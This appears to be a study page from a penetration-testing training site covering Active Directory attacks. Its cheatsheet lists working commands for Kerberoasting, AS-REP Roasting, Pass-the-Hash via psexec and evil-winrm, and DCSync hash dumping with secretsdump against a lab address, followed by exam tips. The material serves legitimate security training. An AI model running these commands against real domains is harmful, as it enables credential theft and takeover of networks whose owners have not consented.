Active Directory Attacks

Active Directory
> Start Learning

πŸ“– Overview

Common AD attack techniques: Kerberoasting, AS-REP Roasting, Pass-the-Hash, DCSync.

🎯
4
Exercises
πŸƒ
4
Flashcards
πŸ—ΊοΈ
1
Mind Maps

πŸ“‹ Cheatsheet

Kerberoasting

GetUserSPNs.py domain/user:pass -dc-ip 10.10.10.5 -request # Request TGS for Kerberoasting
hashcat -m 13100 krb5tgs.txt wordlist.txt # Crack TGS hashes

AS-REP Roasting

GetNPUsers.py domain/ -usersfile users.txt -dc-ip 10.10.10.5 # Check for AS-REP Roasting (no pre-auth)

Pass-the-Hash

impacket-psexec -hashes :NTHASH user@10.10.10.5 # Pass-the-Hash with PsExec
evil-winrm -i 10.10.10.5 -u user -H NTHASH # Pass-the-Hash with Evil-WinRM

DCSync

secretsdump.py domain/user:pass@10.10.10.5 # DCSync to dump domain hashes (needs rights)

πŸ’» Command Examples

⚠️ Common Pitfalls

  • Using wrong hash format
  • Not trying PTH when creds fail

πŸ’‘ Exam Survival Tips

  • Check for unconstrained delegation
  • Look for GenericAll permissions

πŸ—ΊοΈ Mind Maps